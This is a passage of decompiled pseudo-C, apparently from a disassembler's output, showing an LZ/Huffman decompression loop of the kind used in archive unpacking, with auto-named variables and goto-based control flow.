				signed int _t448;
				signed short _t449;
				signed int _t450;
				signed int _t454;
				unsigned int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
				signed int _t469;
				signed short _t470;
				unsigned int _t475;
				signed int _t480;
				unsigned int _t482;
				signed int _t496;
				signed int _t499;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				intOrPtr* _t512;
				intOrPtr* _t513;
				signed int _t514;
				intOrPtr* _t515;
				signed int _t516;
				signed int _t522;
				signed int _t524;
				signed int* _t525;
				intOrPtr _t526;
				void* _t529;
				signed int _t532;
				signed int* _t535;
				unsigned int _t538;
				signed int _t539;
				void* _t540;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t559;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t565;
				signed int _t568;
				unsigned int _t575;
				signed int _t576;
				void* _t577;
				signed int _t580;
				void* _t583;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				void* _t593;
				signed int _t596;
				intOrPtr* _t598;
				void* _t599;
				signed int _t602;
				void* _t605;
				signed int _t609;
				signed int _t610;
				intOrPtr* _t612;
				void* _t613;
				void* _t616;
				signed int _t619;
				intOrPtr* _t625;
				void* _t626;
				unsigned int _t633;
				signed int _t636;
				signed int _t637;
				unsigned int _t639;
				signed int _t642;
				void* _t645;
				signed int _t646;
				void* _t649;
				signed int _t650;
				signed int _t651;
				void* _t654;
				unsigned int _t656;
				unsigned int _t660;
				signed int _t663;
				signed int _t665;
				unsigned int _t666;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed short _t672;
				signed int _t673;
				signed int _t674;
				unsigned int _t678;
				signed int _t680;
				intOrPtr _t684;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int* _t689;
				char* _t692;
				char* _t693;
				signed int _t696;
				void* _t697;
				void* _t700;

				L0:
				while(1) {
					L0:
					_t684 = __esi;
					_t525 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
							goto L11;
						} else {
							_t513 = _t684 + 0x8c;
							goto L3;
						}
						while(1) {
							L3:
							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t684 + 0x9c)) != 0) {
								L97:
								_t360 = E00C75202(_t684);
								L98:
								return _t360;
							}
							L7:
							_push(_t513);
							_push(_t689);
							_t360 = E00C73E0B(_t684);
							if(_t360 == 0) {
								goto L98;
							}
							L8:
							_push(_t684 + 0xa0);
							_push(_t513);
							_push(_t689);
							_t360 = E00C743BF(_t684);
							if(_t360 != 0) {
								continue;
							} else {
								goto L98;
							}
						}
						L10:
						_t496 = E00C74E52(_t684);
						__eflags = _t496;
						if(_t496 == 0) {
							goto L97;
						}
						L11:
						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
							L17:
							_t344 = E00C6A89D(_t689);
							_t345 =  *(_t684 + 0x124);
							_t633 = _t344 & 0x0000fffe;
							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
								L19:
								_t671 = 0xf;
								_t346 = _t345 + 1;
								__eflags = _t346 - _t671;
								if(_t346 >= _t671) {
									L25:
									_t499 = _t689[1] + _t671;
									_t348 = _t499 >> 3;
									 *_t689 =  *_t689 + _t348;
									 *(_t697 + 0x10) =  *_t689;
									_t689[1] = _t499 & 0x00000007;
									_t529 = 0x10;
									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
									asm("sbb eax, eax");
									_t349 = _t348 & _t532;
									__eflags = _t349;
									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
									_t350 =  *(_t697 + 0x10);
									goto L26;
								} else {
									_t625 = _t684 + (_t346 + 0x29) * 4;
									while(1) {
										L21:
										__eflags = _t633 -  *_t625;
										if(_t633 <  *_t625) {
											_t671 = _t346;
											goto L25;
										}
										L22:
										_t346 = _t346 + 1;
										_t625 = _t625 + 4;
										__eflags = _t346 - 0xf;
										if(_t346 < 0xf) {
											continue;
										} else {
											goto L25;
										}
									}
									goto L25;
								}
							} else {
								_t626 = 0x10;
								_t670 = _t633 >> _t626 - _t345;
								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
								 *_t689 =  *_t689 + (_t508 >> 3);
								_t504 = _t508 & 0x00000007;
								_t350 =  *_t689;
								_t689[1] = _t504;
								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
								 *(_t697 + 0x10) = _t350;
								L26:
								_t636 = _t672 & 0x0000ffff;
								__eflags = _t636 - 0x100;
								if(_t636 >= 0x100) {
									L30:
									__eflags = _t636 - 0x106;
									if(_t636 < 0x106) {
										L94:
										__eflags = _t636 - 0x100;
										if(_t636 != 0x100) {
											L100:
											__eflags = _t636 - 0x101;
											if(_t636 != 0x101) {
												L125:
												_t637 = _t636 + 0xfffffefe;
												__eflags = _t637;
												_t535 = _t684 + (_t637 + 0x18) * 4;
												_t501 =  *_t535;
												 *(_t697 + 0x18) = _t501;
												if(_t637 == 0) {
													L127:
													 *(_t684 + 0x60) = _t501;
													_t351 = E00C6A89D(_t689);
													_t352 =  *(_t684 + 0x2de8);
													_t639 = _t351 & 0x0000fffe;
													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
														L129:
														_t673 = 0xf;
														_t353 = _t352 + 1;
														__eflags = _t353 - _t673;
														if(_t353 >= _t673) {
															L135:
															_t538 = _t689[1] + _t673;
															_t539 = _t538 & 0x00000007;
															_t689[1] = _t539;
															_t355 = _t538 >> 3;
															 *_t689 =  *_t689 + _t355;
															 *(_t697 + 0x20) = _t539;
															_t540 = 0x10;
															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
															asm("sbb eax, eax");
															_t356 = _t355 & _t543;
															__eflags = _t356;
															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
															L136:
															_t674 = _t357 & 0x0000ffff;
															__eflags = _t674 - 8;
															if(_t674 >= 8) {
																_t504 = (_t674 >> 2) - 1;
																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
																__eflags = _t504;
																if(_t504 != 0) {
																	_t409 = E00C6A89D(_t689);
																	_t556 = 0x10;
																	_t678 = _t678 + (_t409 >> _t556 - _t504);
																	_t559 =  *(_t697 + 0x20) + _t504;
																	 *_t689 =  *_t689 + (_t559 >> 3);
																	_t560 = _t559 & 0x00000007;
																	__eflags = _t560;
																	_t689[1] = _t560;
																}
															} else {
																_t678 = _t674 + 2;
															}
															__eflags =  *((char*)(_t684 + 0x4c44));
															_t545 =  *(_t697 + 0x18);
															 *(_t684 + 0x74) = _t678;
															if( *((char*)(_t684 + 0x4c44)) == 0) {
																L142:
																_t642 =  *(_t684 + 0x7c);
																_t506 = _t642 - _t545;
																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t506 - _t359;
																if(_t506 >= _t359) {
																	goto L152;
																}
																L143:
																__eflags = _t642 - _t359;
																if(_t642 >= _t359) {
																	goto L152;
																}
																L144:
																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
																_t512 = _t506 + _t363;
																_t692 = _t642 + _t363;
																_t645 = 8;
																 *(_t684 + 0x7c) = _t642 + _t678;
																__eflags = _t678 - _t645;
																if(_t678 < _t645) {
																	L114:
																	_t525 = _t684 + 0x7c;
																	__eflags = _t678;
																	if(_t678 == 0) {
																		L89:
																		_t689 = _t684 + 4;
																		continue;
																	}
																	L115:
																	_t525 = _t684 + 0x7c;
																	 *_t692 =  *_t512;
																	__eflags = _t678 - 1;
																	if(_t678 <= 1) {
																		goto L89;
																	}
																	L116:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	__eflags = _t678 - 2;
																	if(_t678 <= 2) {
																		goto L89;
																	}
																	L117:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 <= 3) {
																		goto L89;
																	}
																	L118:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	__eflags = _t678 - 4;
																	if(_t678 <= 4) {
																		goto L89;
																	}
																	L119:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	__eflags = _t678 - 5;
																	if(_t678 <= 5) {
																		goto L89;
																	}
																	L120:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	__eflags = _t678 - 6;
																	if(_t678 <= 6) {
																		goto L89;
																	}
																	L121:
																	_t360 =  *((intOrPtr*)(_t512 + 6));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	goto L155;
																}
																L145:
																__eflags = _t545 - _t678;
																if(_t545 >= _t678) {
																	L149:
																	_t372 = _t678 >> 3;
																	__eflags = _t372;
																	 *(_t697 + 0x20) = _t372;
																	_t686 = _t372;
																	do {
																		L150:
																		E00C80320(_t692, _t512, _t645);
																		_t697 = _t697 + 0xc;
																		_t645 = 8;
																		_t512 = _t512 + _t645;
																		_t692 = _t692 + _t645;
																		_t678 = _t678 - _t645;
																		_t686 = _t686 - 1;
																		__eflags = _t686;
																	} while (_t686 != 0);
																	L113:
																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
																	goto L114;
																}
																L146:
																_t548 = _t678 >> 3;
																__eflags = _t548;
																do {
																	L147:
																	_t678 = _t678 - _t645;
																	 *_t692 =  *_t512;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	_t381 =  *((intOrPtr*)(_t512 + 7));
																	_t512 = _t512 + _t645;
																	 *((char*)(_t692 + 7)) = _t381;
																	_t692 = _t692 + _t645;
																	_t548 = _t548 - 1;
																	__eflags = _t548;
																} while (_t548 != 0);
																goto L114;
															} else {
																L141:
																_push( *(_t684 + 0xe6dc));
																_push(_t684 + 0x7c);
																_push(_t545);
																L70:
																_push(_t678);
																E00C72C30();
																while(1) {
																	L0:
																	_t684 = __esi;
																	_t525 = __esi + 0x7c;
																	do {
																		do {
																			goto L3;
																			L152:
																			_t525 = _t684 + 0x7c;
																			__eflags = _t678;
																		} while (_t678 == 0);
																		_t360 =  *(_t684 + 0xe6dc);
																		do {
																			L154:
																			_t361 = _t360 & _t506;
																			_t506 = _t506 + 1;
																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
																			_t360 =  *(_t684 + 0xe6dc);
																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
																			 *(_t684 + 0x7c) = _t642;
																			_t678 = _t678 - 1;
																			__eflags = _t678;
																		} while (_t678 != 0);
																		L155:
																		goto L0;
																		do {
																			while(1) {
																				L0:
																				_t684 = __esi;
																				_t525 = __esi + 0x7c;
																				L1:
																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
																					goto L11;
																				} else {
																					_t513 = _t684 + 0x8c;
																					goto L3;
																				}
																			}
																			L96:
																			_t438 = E00C7253E(_t684, _t697 + 0x28);
																			__eflags = _t438;
																		} while (_t438 != 0);
																		goto L97;
																		L90:
																		_t525 = _t684 + 0x7c;
																		__eflags = _t678;
																	} while (_t678 == 0);
																	_t386 =  *(_t684 + 0xe6dc);
																	_t514 =  *(_t697 + 0x20);
																	do {
																		L92:
																		_t387 = _t386 & _t514;
																		_t514 = _t514 + 1;
																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
																		_t386 =  *(_t684 + 0xe6dc);
																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
																		 *(_t684 + 0x7c) = _t646;
																		_t678 = _t678 - 1;
																		__eflags = _t678;
																	} while (_t678 != 0);
																	goto L155;
																}
															}
														}
														L130:
														_t562 = _t684 + (_t353 + 0xb5a) * 4;
														while(1) {
															L131:
															__eflags = _t639 -  *_t562;
															if(_t639 <  *_t562) {
																break;
															}
															L132:
															_t353 = _t353 + 1;
															_t562 = _t562 + 4;
															__eflags = _t353 - 0xf;
															if(_t353 < 0xf) {
																continue;
															}
															L133:
															goto L135;
														}
														L134:
														_t673 = _t353;
														goto L135;
													}
													L128:
													_t563 = 0x10;
													_t650 = _t639 >> _t563 - _t352;
													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
													 *_t689 =  *_t689 + (_t524 >> 3);
													_t504 = _t524 & 0x00000007;
													_t689[1] = _t504;
													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
													 *(_t697 + 0x20) = _t504;
													goto L136;
												} else {
													goto L126;
												}
												do {
													L126:
													 *_t535 =  *(_t535 - 4);
													_t535 = _t535 - 4;
													_t637 = _t637 - 1;
													__eflags = _t637;
												} while (_t637 != 0);
												goto L127;
											}
											L101:
											_t678 =  *(_t684 + 0x74);
											__eflags = _t678;
											if(_t678 == 0) {
												while(1) {
													L0:
													_t684 = __esi;
													_t525 = __esi + 0x7c;
													goto L1;
												}
											}
											L102:
											__eflags =  *((char*)(_t684 + 0x4c44));
											if( *((char*)(_t684 + 0x4c44)) == 0) {
												L104:
												_t651 =  *(_t684 + 0x7c);
												_t565 =  *(_t684 + 0x60);
												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
												_t510 = _t651 - _t565;
												__eflags = _t510 - _t417;
												if(_t510 >= _t417) {
													L122:
													_t418 =  *(_t684 + 0xe6dc);
													do {
														L123:
														_t419 = _t418 & _t510;
														_t510 = _t510 + 1;
														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
														_t418 =  *(_t684 + 0xe6dc);
														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
														 *(_t684 + 0x7c) = _t651;
														_t678 = _t678 - 1;
														__eflags = _t678;
													} while (_t678 != 0);
													goto L155;
												}
												L105:
												__eflags = _t651 - _t417;
												if(_t651 >= _t417) {
													goto L122;
												}
												L106:
												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
												_t512 = _t510 + _t421;
												_t692 = _t651 + _t421;
												_t654 = 8;
												 *(_t684 + 0x7c) = _t651 + _t678;
												__eflags = _t678 - _t654;
												if(_t678 < _t654) {
													goto L114;
												}
												L107:
												__eflags = _t565 - _t678;
												if(_t565 >= _t678) {
													L111:
													_t424 = _t678 >> 3;
													__eflags = _t424;
													 *(_t697 + 0x20) = _t424;
													_t688 = _t424;
													do {
														L112:
														E00C80320(_t692, _t512, _t654);
														_t697 = _t697 + 0xc;
														_t654 = 8;
														_t512 = _t512 + _t654;
														_t692 = _t692 + _t654;
														_t678 = _t678 - _t654;
														_t688 = _t688 - 1;
														__eflags = _t688;
													} while (_t688 != 0);
													goto L113;
												}
												L108:
												_t568 = _t678 >> 3;
												__eflags = _t568;
												do {
													L109:
													_t678 = _t678 - _t654;
													 *_t692 =  *_t512;
													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
													_t433 =  *((intOrPtr*)(_t512 + 7));
													_t512 = _t512 + _t654;
													 *((char*)(_t692 + 7)) = _t433;
													_t692 = _t692 + _t654;
													_t568 = _t568 - 1;
													__eflags = _t568;
												} while (_t568 != 0);
												goto L114;
											}
											L103:
											_push( *(_t684 + 0xe6dc));
											_push(_t684 + 0x7c);
											_push( *(_t684 + 0x60));
											goto L70;
										}
										L95:
										_push(_t697 + 0x28);
										_t436 = E00C73F9D(_t684, _t689);
										__eflags = _t436;
										if(_t436 == 0) {
											goto L97;
										}
										goto L96;
									}
									L31:
									_t680 = _t636 - 0x106;
									__eflags = _t680 - 8;
									if(_t680 >= 8) {
										_t441 = (_t680 >> 2) - 1;
										 *(_t697 + 0x20) = _t441;
										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
										__eflags = _t441;
										if(_t441 != 0) {
											_t482 = E00C6A89D(_t689);
											_t522 = _t504 +  *(_t697 + 0x20);
											_t616 = 0x10;
											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
											_t504 = _t522 & 0x00000007;
											__eflags = _t504;
											 *(_t697 + 0x10) = _t619;
											 *_t689 = _t619;
											_t689[1] = _t504;
										}
									} else {
										 *(_t697 + 0x10) = _t350;
										_t678 = _t680 + 2;
									}
									_t442 = E00C6A89D(_t689);
									_t443 =  *(_t684 + 0x1010);
									_t656 = _t442 & 0x0000fffe;
									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
										L37:
										_t516 = 0xf;
										_t444 = _t443 + 1;
										__eflags = _t444 - _t516;
										if(_t444 >= _t516) {
											L43:
											_t575 = _t689[1] + _t516;
											_t576 = _t575 & 0x00000007;
											_t689[1] = _t576;
											 *_t689 =  *_t689 + (_t575 >> 3);
											_t447 =  *_t689;
											 *(_t697 + 0x10) = _t576;
											_t577 = 0x10;
											 *(_t697 + 0x14) = _t447;
											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
											asm("sbb eax, eax");
											_t448 = _t447 & _t580;
											__eflags = _t448;
											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
											goto L44;
										}
										L38:
										_t612 = _t684 + (_t444 + 0x3e4) * 4;
										while(1) {
											L39:
											__eflags = _t656 -  *_t612;
											if(_t656 <  *_t612) {
												break;
											}
											L40:
											_t444 = _t444 + 1;
											_t612 = _t612 + 4;
											__eflags = _t444 - 0xf;
											if(_t444 < 0xf) {
												continue;
											}
											L41:
											goto L43;
										}
										L42:
										_t516 = _t444;
										goto L43;
									} else {
										L36:
										_t613 = 0x10;
										_t666 = _t656 >> _t613 - _t443;
										 *(_t697 + 0x20) = _t666;
										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
										_t669 = _t668 & 0x00000007;
										 *(_t697 + 0x14) = _t480;
										 *_t689 = _t480;
										_t689[1] = _t669;
										 *(_t697 + 0x10) = _t669;
										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
										L44:
										_t450 = _t449 & 0x0000ffff;
										__eflags = _t450 - 4;
										if(_t450 >= 4) {
											L46:
											_t696 = (_t450 >> 1) - 1;
											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
											 *(_t697 + 0x20) = _t454;
											_t504 = _t454;
											 *(_t697 + 0x18) = _t504;
											__eflags = _t696;
											if(_t696 == 0) {
												L63:
												_t689 = _t684 + 4;
												L64:
												__eflags = _t504 - 0x100;
												if(_t504 > 0x100) {
													_t678 = _t678 + 1;
													__eflags = _t504 - 0x2000;
													if(_t504 > 0x2000) {
														_t678 = _t678 + 1;
														__eflags = _t504 - 0x40000;
														if(_t504 > 0x40000) {
															_t678 = _t678 + 1;
															__eflags = _t678;
														}
													}
												}
												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
												 *(_t684 + 0x68) =  *(_t684 + 0x64);
												 *(_t684 + 0x64) =  *(_t684 + 0x60);
												 *(_t684 + 0x60) = _t504;
												__eflags =  *((char*)(_t684 + 0x4c44));
												 *(_t684 + 0x74) = _t678;
												if( *((char*)(_t684 + 0x4c44)) == 0) {
													L71:
													_t646 =  *(_t684 + 0x7c);
													_t551 = _t646 - _t504;
													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
													 *(_t697 + 0x20) = _t551;
													__eflags = _t551 - _t385;
													if(_t551 >= _t385) {
														goto L90;
													}
													L72:
													__eflags = _t646 - _t385;
													if(_t646 >= _t385) {
														goto L90;
													}
													L73:
													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
													_t515 = _t389 + _t551;
													_t693 = _t646 + _t389;
													_t649 = 8;
													_t525 = _t684 + 0x7c;
													 *_t525 = _t646 + _t678;
													__eflags = _t678 - _t649;
													if(_t678 < _t649) {
														L81:
														__eflags = _t678;
														if(_t678 != 0) {
															 *_t693 =  *_t515;
															__eflags = _t678 - 1;
															if(_t678 > 1) {
																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
																__eflags = _t678 - 2;
																if(_t678 > 2) {
																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 > 3) {
																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
																		__eflags = _t678 - 4;
																		if(_t678 > 4) {
																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
																			__eflags = _t678 - 5;
																			if(_t678 > 5) {
																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
																				__eflags = _t678 - 6;
																				if(_t678 > 6) {
																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L89;
													}
													L74:
													__eflags =  *(_t697 + 0x18) - _t678;
													if( *(_t697 + 0x18) >= _t678) {
														L78:
														_t399 = _t678 >> 3;
														__eflags = _t399;
														 *(_t697 + 0x20) = _t399;
														_t687 = _t399;
														do {
															L79:
															E00C80320(_t693, _t515, _t649);
															_t697 = _t697 + 0xc;
															_t649 = 8;
															_t515 = _t515 + _t649;
															_t693 = _t693 + _t649;
															_t678 = _t678 - _t649;
															_t687 = _t687 - 1;
															__eflags = _t687;
														} while (_t687 != 0);
														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
														_t525 =  *(_t697 + 0x24);
														goto L81;
													}
													L75:
													_t554 = _t678 >> 3;
													__eflags = _t554;
													do {
														L76:
														_t678 = _t678 - _t649;
														 *_t693 =  *_t515;
														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
														_t408 =  *((intOrPtr*)(_t515 + 7));
														_t515 = _t515 + _t649;
														 *((char*)(_t693 + 7)) = _t408;
														_t693 = _t693 + _t649;
														_t554 = _t554 - 1;
														__eflags = _t554;
													} while (_t554 != 0);
													_t525 = _t684 + 0x7c;
													goto L81;
												} else {
													L69:
													_push( *(_t684 + 0xe6dc));
													_push(_t684 + 0x7c);
													_push(_t504);
													goto L70;
												}
											}
											L47:
											__eflags = _t696 - 4;
											if(__eflags < 0) {
												L62:
												_t459 = E00C78934(_t684 + 4);
												_t583 = 0x20;
												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
												_t586 =  *(_t697 + 0x10) + _t696;
												 *(_t697 + 0x18) = _t504;
												_t689 = _t684 + 4;
												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t586 & 0x00000007;
												goto L64;
											}
											L48:
											if(__eflags <= 0) {
												_t689 = _t684 + 4;
											} else {
												_t475 = E00C78934(_t684 + 4);
												_t605 = 0x24;
												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
												_t689 = _t684 + 4;
												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
												_t610 = _t609 & 0x00000007;
												 *(_t697 + 0x14) = _t665;
												 *_t689 = _t665;
												 *(_t697 + 0x10) = _t610;
												_t689[1] = _t610;
											}
											_t463 = E00C6A89D(_t689);
											_t464 =  *(_t684 + 0x1efc);
											_t660 = _t463 & 0x0000fffe;
											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
												L53:
												_t589 = 0xf;
												_t465 = _t464 + 1;
												 *(_t697 + 0x18) = _t589;
												__eflags = _t465 - _t589;
												if(_t465 >= _t589) {
													L59:
													_t591 = _t689[1] +  *(_t697 + 0x18);
													 *_t689 =  *_t689 + (_t591 >> 3);
													_t468 =  *(_t697 + 0x18);
													_t689[1] = _t591 & 0x00000007;
													_t593 = 0x10;
													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
													asm("sbb eax, eax");
													_t469 = _t468 & _t596;
													__eflags = _t469;
													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
													goto L60;
												}
												L54:
												_t598 = _t684 + (_t465 + 0x79f) * 4;
												while(1) {
													L55:
													__eflags = _t660 -  *_t598;
													if(_t660 <  *_t598) {
														break;
													}
													L56:
													_t465 = _t465 + 1;
													_t598 = _t598 + 4;
													__eflags = _t465 - 0xf;
													if(_t465 < 0xf) {
														continue;
													}
													L57:
													goto L59;
												}
												L58:
												 *(_t697 + 0x18) = _t465;
												goto L59;
											} else {
												L52:
												_t599 = 0x10;
												_t663 = _t660 >> _t599 - _t464;
												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t602 & 0x00000007;
												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
												L60:
												_t504 = _t504 + (_t470 & 0x0000ffff);
												__eflags = _t504;
												L61:
												 *(_t697 + 0x18) = _t504;
												goto L64;
											}
										}
										L45:
										_t504 = _t450 + 1;
										goto L61;
									}
								}
								L27:
								__eflags =  *((char*)(_t684 + 0x4c44));
								if( *((char*)(_t684 + 0x4c44)) == 0) {
									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
									_t525 = _t684 + 0x7c;
									 *_t525 =  *_t525 + 1;
									continue;
								} else {
									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
									 *((char*)(E00C72391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
									goto L0;
								}
							}
						}
						L12:
						__eflags = _t526 -  *(_t684 + 0x7c);
						if(_t526 ==  *(_t684 + 0x7c)) {
							goto L17;
						}
						L13:
						E00C75202(_t684);
						_t360 =  *(_t684 + 0x4c5c);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
						if(__eflags > 0) {
							goto L98;
						}
						L14:
						if(__eflags < 0) {
							L16:
							__eflags =  *((char*)(_t684 + 0x4c50));
							if( *((char*)(_t684 + 0x4c50)) != 0) {
								L156:
								 *((char*)(_t684 + 0x4c60)) = 0;
								goto L98;
							}
							goto L17;
						}
						L15:
						_t360 =  *(_t684 + 0x4c58);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
							goto L98;
						}
						goto L16;
					}
				}
			}

0x00c762ca
0x00c762ca
